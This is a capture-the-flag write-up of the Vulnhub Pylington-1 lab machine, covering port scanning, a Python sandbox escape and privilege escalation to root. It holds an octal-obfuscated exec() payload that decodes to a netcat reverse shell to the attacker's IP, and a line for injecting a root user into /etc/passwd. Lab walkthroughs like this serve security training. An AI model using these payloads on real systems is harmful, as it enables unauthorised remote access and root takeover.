Vulnhub Pylington: 1 Write-up!!

Hi, hope you are well and healthy. This is the write-up for the Pylington-1 vulnhub machine.

If you want to solve this machine you can download it from here.

Vulnhub Pylington-1

Let’s begin with finding all open ports on the machine using nmap.

nmap: finding open ports

Now lets find the services and their version on port 22 and 80.

Service version

As we can see, there are 3 disallowed entries in robots.txt When we visit the port 80, below page in opened in browser.

port 80

Robots.txt entries:

robots.txt

When I tried to visit, /register page, I got the message that currently we are unable to register.

/register

Then I visit “/zbir7mn240soxhicso2z”, I got the username and password.

When I logged in, I got redirected to below page.

As it says, it is a Super Secret Python IDE and it also mentioned it uses sandbox. Just to test the IDE, I used print command which worked with no issues. Then I used “__import__ (‘us). system (‘ls -la’)”, I got below message.

Then I searched for “NoImportOS Sandbox code executoin BYPASS”, got below result

I used below payload:

Payload in hexadecimal:

exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51”)

Input:

Output:

We have code execution, then I used nc to get reverse shell.

Final Payload:

exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\57\165\163\162\57\142\151\156\57\156\143\40\55\145\40\57\142\151\156\57\142\141\163\150\40\61\71\62\56\61\66\70\56\71\56\63\40\64\64\63\47\51\12”)

Started the netcat listener on port 443 on attacking machine and execute the above payload, got reverse shell.

As we see, there is a file named “typing” with suid bit set.

Road to user py:

I execute the “typing” file and got the password for use py.

Using above username and password I SSH into the box.

user flag

In the py directory, there is a directory called secret_stuff which has couple of files. The backup has a suid set and it is running with root permission

Source code for backup.

The backup append the line to the file in the directory /srv/backups/. If we want to become root, we can add user with root permission in the /etc/passwd file, but the source says it should be in /srv/backups/.

Lets first create a password for the username using openssl.

both username and password are rootit

We need to append below line to /etc/passwd file:

rootit:A01LlfJ378prI:0:0:/root/root:/bin/bash

Able to append the line into /etc/passwd

Lets try to login with it.We are now root on the box.

root flag.

Hope you like the write-up…stay home stay safe.

References: